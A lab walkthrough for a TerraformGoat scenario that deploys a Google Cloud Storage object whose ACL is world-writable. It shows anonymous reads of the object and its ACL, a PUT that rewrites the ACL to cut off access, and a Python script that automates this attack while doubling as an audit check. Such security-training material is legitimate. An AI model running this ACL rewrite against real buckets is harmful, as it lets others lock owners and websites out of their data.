English | 中文
This scenario builds a GCP Cloud Storage environment in which an object's ACL is writable by anyone.
After the environment is built with Terraform, a user can modify the object's ACL policy, either to grant themselves access to data they could not otherwise read or, as shown below, to revoke everyone else's access to it.
Perform GCP authentication with the following commands: generate a key file for a service account, copy the key into the container, and activate it there.

```
docker cp key.json terraformgoat:/terraformgoat   # run on the host
docker exec -it terraformgoat /bin/bash           # run on the host
gcloud auth activate-service-account --key-file key.json   # run in the container
```

Execute the following command in the container:

```
cd /TerraformGoat/gcp/cs/object_acl_writable/
```

Edit the terraform.tfvars file and fill in your GCP project ID:

```
vim terraform.tfvars
```

Deploy the vulnerable environment:

```
terraform init
terraform apply
```

When the terminal prompts `Enter a value:`, enter `yes`.
When the command finishes, the bucket name is shown under Outputs. The object key is `flag`, and the object ACL grants AllUsers read and write access (FULL_CONTROL), so anyone can both read the ACL and rewrite it.
Attempt to read the flag file; it is accessible:

```
https://storage.googleapis.com/hx-cloud-security-xxx/flag
```

Attempt to read the ACL policy of the flag file; it can be read as well:

```
https://storage.googleapis.com/hx-cloud-security-xxx/flag?acl
```

Use the PUT method to upload a new ACL policy for the flag file. Starting from the original policy, delete the following entry and upload the rest; the upload succeeds, because the entry being removed is exactly the one that gives anonymous users FULL_CONTROL.

```xml
<Entry>
<Scope type='AllUsers'/>
<Permission>FULL_CONTROL</Permission>
</Entry>
```

If you try to read the flag file again, it can no longer be read. Used against a website that references cloud storage resources, this method can take those resources, and with them the site, offline. The root cause is the FULL_CONTROL grant to AllUsers on the object; enabling uniform bucket-level access on a bucket disables object ACLs altogether, so none of its objects can be exposed this way.
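The three exploit steps above, automated as one script. This is an added example, not code from TerraformGoat: it fetches the object ACL through the XML API, reports which permissions are granted to AllUsers (the same check a defender would run against their own buckets), strips the AllUsers entry exactly as the manual PUT does, uploads the result, and then confirms the object is no longer anonymously readable. The bucket name is an assumption passed on the command line (use the one printed under Outputs); `SAMPLE_ACL` is a constructed ACL with a made-up owner ID so the parsing functions can be exercised offline.

```python
"""Audit and rewrite a GCS object ACL through the XML API (the ?acl query).

Added example for the object_acl_writable scenario; not TerraformGoat code.
The bucket name is assumed (pass the one printed under Outputs); the object
key defaults to "flag", which the scenario fixes.
"""
import sys
import urllib.error
import urllib.request
import xml.etree.ElementTree as ET

GCS = "https://storage.googleapis.com"

# Constructed sample ACL in the GCS XML API schema, shaped like the one the
# scenario's flag object returns. The owner ID is made up.
SAMPLE_ACL = """<?xml version="1.0" encoding="UTF-8"?>
<AccessControlList>
  <Owner><ID>00b4903a97example0owner0id</ID></Owner>
  <Entries>
    <Entry>
      <Scope type="UserById"><ID>00b4903a97example0owner0id</ID></Scope>
      <Permission>FULL_CONTROL</Permission>
    </Entry>
    <Entry>
      <Scope type="AllUsers"/>
      <Permission>FULL_CONTROL</Permission>
    </Entry>
  </Entries>
</AccessControlList>
"""


def _parse(acl_xml):
    # Accept str or bytes; ET wants bytes when an encoding declaration is present.
    if isinstance(acl_xml, str):
        acl_xml = acl_xml.encode("utf-8")
    return ET.fromstring(acl_xml)


def public_grants(acl_xml):
    """Permissions granted to AllUsers. For objects the XML API uses READ and
    FULL_CONTROL; FULL_CONTROL here means anyone may PUT a new ACL."""
    return [
        entry.findtext("Permission")
        for entry in _parse(acl_xml).iter("Entry")
        if entry.find("Scope").get("type") == "AllUsers"
    ]


def drop_scope(acl_xml, scope_type="AllUsers"):
    """Return the ACL with every Entry for scope_type removed: the edit the
    scenario makes by hand. The owner's entry survives, anonymous access does not."""
    root = _parse(acl_xml)
    entries = root.find("Entries")
    for entry in list(entries):
        if entry.find("Scope").get("type") == scope_type:
            entries.remove(entry)
    return ET.tostring(root, encoding="unicode")


def get_acl(bucket, key):
    """Anonymous GET of <bucket>/<key>?acl; returns the XML body as str."""
    with urllib.request.urlopen(f"{GCS}/{bucket}/{key}?acl") as resp:
        return resp.read().decode("utf-8")


def put_acl(bucket, key, acl_xml):
    """Anonymous PUT of a replacement ACL; returns the HTTP status (200 on success)."""
    req = urllib.request.Request(
        f"{GCS}/{bucket}/{key}?acl",
        data=acl_xml.encode("utf-8"),
        method="PUT",
        headers={"Content-Type": "application/xml"},
    )
    with urllib.request.urlopen(req) as resp:
        return resp.status


def main(bucket, key="flag"):
    acl = get_acl(bucket, key)
    grants = public_grants(acl)
    print(f"AllUsers grants on {key}: {grants}")
    if "FULL_CONTROL" not in grants:
        print("ACL is readable but not publicly writable; nothing to do.")
        return
    print("PUT ?acl ->", put_acl(bucket, key, drop_scope(acl)))
    try:
        urllib.request.urlopen(f"{GCS}/{bucket}/{key}")
        print("object is still readable (unexpected)")
    except urllib.error.HTTPError as exc:
        print(f"anonymous GET of {key} now fails with HTTP {exc.code}")


if __name__ == "__main__":
    if len(sys.argv) < 2:
        sys.exit("usage: python3 gcs_acl_rewrite.py <bucket-name> [object-key]")
    main(*sys.argv[1:3])
```

Run it as `python3 gcs_acl_rewrite.py <bucket-name> flag` from the container or any host with network access (the file name is arbitrary). Only `public_grants` and `drop_scope` work offline; `get_acl` and `put_acl` talk to storage.googleapis.com. Pointing `public_grants` at your own objects, with `?acl` fetched anonymously, is the quick way to find the misconfiguration this scenario deploys: any non-empty result means the object is world-readable, and FULL_CONTROL means its ACL is world-writable too.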
Destroy the vulnerable environment:

```
terraform destroy
```



